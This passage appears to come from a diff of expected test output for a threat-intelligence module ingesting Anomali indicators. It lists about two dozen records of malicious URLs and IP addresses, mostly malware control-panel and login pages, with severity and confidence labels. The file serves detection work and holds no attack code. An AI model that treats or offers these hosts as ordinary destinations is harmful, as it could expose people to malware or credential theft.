ID: 55250078035; iType: mal_url; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-93" + ], + "threatintel.anomali.modified": "2020-01-24T02:57:12.997Z", + "threatintel.anomali.name": "mal_url: http://byedtronchgroup.yt/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://byedtronchgroup.yt/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:57:12.997Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "byedtronchgroup.yt", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://byedtronchgroup.yt/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 31656, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078008; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-87" + ], + "threatintel.anomali.modified": "2020-01-24T02:57:13.025Z", + "threatintel.anomali.name": "mal_url: http://199.192.28.11/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://199.192.28.11/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:57:13.025Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "199.192.28.11", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://199.192.28.11/panel/admin.php", + "threatintel.indicator.url.path": "/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 32244, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078038; iType: mal_url; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-82" + ], + "threatintel.anomali.modified": "2020-01-24T02:57:32.901Z", + "threatintel.anomali.name": "mal_url: http://217.8.117.51/aW8bVds1/login.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://217.8.117.51/aW8bVds1/login.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:57:32.901Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "217.8.117.51", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://217.8.117.51/aW8bVds1/login.php", + "threatintel.indicator.url.path": "/aW8bVds1/login.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 32820, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078026; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-93" + ], + "threatintel.anomali.modified": "2020-01-24T02:57:32.929Z", + "threatintel.anomali.name": "mal_url: http://lansome.site/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://lansome.site/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:57:32.929Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "lansome.site", + "threatintel.indicator.url.original": "http://lansome.site/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 33391, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078034; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-83" + ], + "threatintel.anomali.modified": "2020-01-24T02:57:49.028Z", + "threatintel.anomali.name": "mal_url: http://iplusvietnam.com.vn/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://iplusvietnam.com.vn/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:57:49.028Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "iplusvietnam.com.vn", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://iplusvietnam.com.vn/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 34081, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078032; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-94" + ], + "threatintel.anomali.modified": "2020-01-24T02:58:03.345Z", + "threatintel.anomali.name": "mal_url: http://leakaryadeen.com/parl/id345/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://leakaryadeen.com/parl/id345/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:58:03.345Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "leakaryadeen.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://leakaryadeen.com/parl/id345/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/parl/id345/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 34720, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078031; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-81" + ], + "threatintel.anomali.modified": "2020-01-24T02:58:16.318Z", + "threatintel.anomali.name": "mal_url: http://oaa-my.com/clap/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://oaa-my.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:58:16.318Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "oaa-my.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://oaa-my.com/clap/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/clap/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 35346, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078027; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-66" + ], + "threatintel.anomali.modified": "2020-01-24T02:58:16.358Z", + "threatintel.anomali.name": "mal_url: http://thaubenuocngam.com/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://thaubenuocngam.com/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:58:16.358Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "thaubenuocngam.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://thaubenuocngam.com/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 36034, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078013; iType: mal_url; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-82" + ], + "threatintel.anomali.modified": "2020-01-24T02:58:32.126Z", + "threatintel.anomali.name": "mal_url: http://suspiciousactivity.xyz/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://suspiciousactivity.xyz/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:58:32.126Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "suspiciousactivity.xyz", + "threatintel.indicator.url.original": "http://suspiciousactivity.xyz/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 36604, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078017; iType: mal_url; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-82" + ], + "threatintel.anomali.modified": "2020-01-24T02:58:37.603Z", + "threatintel.anomali.name": "mal_url: http://217.8.117.8/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://217.8.117.8/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:58:37.603Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "217.8.117.8", + "threatintel.indicator.url.original": "http://217.8.117.8/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 37152, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078012; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-71" + ], + "threatintel.anomali.modified": "2020-01-24T02:58:37.643Z", + "threatintel.anomali.name": "mal_url: http://f0387550.xsph.ru/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://f0387550.xsph.ru/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:58:37.643Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "f0387550.xsph.ru", + "threatintel.indicator.url.original": "http://f0387550.xsph.ru/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 37767, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078018; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-84" + ], + "threatintel.anomali.modified": "2020-01-24T02:58:39.465Z", + "threatintel.anomali.name": "mal_url: http://lf4e4abf.justinstalledpanel.com/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://lf4e4abf.justinstalledpanel.com/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:58:39.465Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "lf4e4abf.justinstalledpanel.com", + "threatintel.indicator.url.original": "http://lf4e4abf.justinstalledpanel.com/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 38372, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078033; iType: mal_ip; State: active; Org: ColoCrossing; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-81" + ], + "threatintel.anomali.modified": "2020-01-24T02:59:02.031Z", + "threatintel.anomali.name": "mal_ip: 206.217.131.245", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '206.217.131.245']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:59:02.031Z", + "threatintel.indicator.ip": "206.217.131.245", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 38925, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078010; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-52" + ], + "threatintel.anomali.modified": "2020-01-24T02:59:15.878Z", + "threatintel.anomali.name": "mal_url: http://67.215.224.101/a1/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://67.215.224.101/a1/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:59:15.878Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "67.215.224.101", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://67.215.224.101/a1/panel/admin.php", + "threatintel.indicator.url.path": "/a1/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 39521, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078000; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-58" + ], + "threatintel.anomali.modified": "2020-01-24T02:59:29.155Z", + "threatintel.anomali.name": "mal_ip: 162.241.73.163", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '162.241.73.163']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:59:29.155Z", + "threatintel.indicator.ip": "162.241.73.163", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 40072, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078020; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-78" + ], + "threatintel.anomali.modified": "2020-01-24T02:59:50.233Z", + "threatintel.anomali.name": "mal_url: http://l60bdd58.justinstalledpanel.com/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://l60bdd58.justinstalledpanel.com/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:59:50.233Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "l60bdd58.justinstalledpanel.com", + "threatintel.indicator.url.original": "http://l60bdd58.justinstalledpanel.com/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 40677, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078009; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-25" + ], + "threatintel.anomali.modified": "2020-01-24T02:59:50.255Z", + "threatintel.anomali.name": "mal_url: http://107.175.150.73/~giftioz/.azma/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://107.175.150.73/~giftioz/.azma/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:59:50.255Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "107.175.150.73", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://107.175.150.73/~giftioz/.azma/panel/admin.php", + "threatintel.indicator.url.path": "/~giftioz/.azma/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 41300, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078023; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-78" + ], + "threatintel.anomali.modified": "2020-01-24T02:59:52.536Z", + "threatintel.anomali.name": "mal_url: http://5.188.60.52/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://5.188.60.52/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:59:52.536Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "5.188.60.52", + "threatintel.indicator.url.original": "http://5.188.60.52/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 41865, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078025; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-85" + ], + "threatintel.anomali.modified": "2020-01-24T02:59:54.784Z", + "threatintel.anomali.name": "mal_url: http://trotdeiman.ga/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://trotdeiman.ga/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:59:54.784Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "trotdeiman.ga", + "threatintel.indicator.url.original": "http://trotdeiman.ga/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 42434, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078014; iType: mal_ip; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-82" + ], + "threatintel.anomali.modified": "2020-01-24T02:59:54.815Z", + "threatintel.anomali.name": "mal_ip: 217.8.117.8", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '217.8.117.8']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:59:54.815Z", + "threatintel.indicator.ip": "217.8.117.8", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 42960, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078036; iType: mal_ip; State: active; Org: Global Frag Networks; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-83" + ], + "threatintel.anomali.modified": "2020-01-24T03:00:01.726Z", + "threatintel.anomali.name": "mal_ip: 104.223.170.113", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '104.223.170.113']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T03:00:01.726Z", + "threatintel.indicator.ip": "104.223.170.113", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 43521, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078011; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-58" + ], + "threatintel.anomali.modified": "2020-01-24T03:00:01.762Z", + "threatintel.anomali.name": "mal_url: http://tavim.org/includes/firmino/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://tavim.org/includes/firmino/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T03:00:01.762Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "tavim.org", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://tavim.org/includes/firmino/admin.php", + "threatintel.indicator.url.path": "/includes/firmino/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 44126, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078015; iType: mal_url; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-84" + ], + "threatintel.anomali.modified": "2020-01-24T03:00:10.928Z", + "threatintel.anomali.name": "mal_url: http://onlinesecuritycenter.xyz/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://onlinesecuritycenter.xyz/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T03:00:10.928Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "onlinesecuritycenter.xyz", + "threatintel.indicator.url.original": "http://onlinesecuritycenter.xyz/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 44700, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078029; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-81" + ], + "threatintel.anomali.modified": "2020-01-24T03:00:20.166Z", + "threatintel.anomali.name": "mal_url: http://oaa-my.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://oaa-my.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T03:00:20.166Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "oaa-my.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://oaa-my.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/cutter/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 45330, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078016; iType: mal_url; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-90" + ], + "threatintel.anomali.modified": "2020-01-24T03:00:24.048Z", + "threatintel.anomali.name": "mal_url: http://jumbajumbadun.fun/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://jumbajumbadun.fun/login']", + "threatintel.anomali.type": 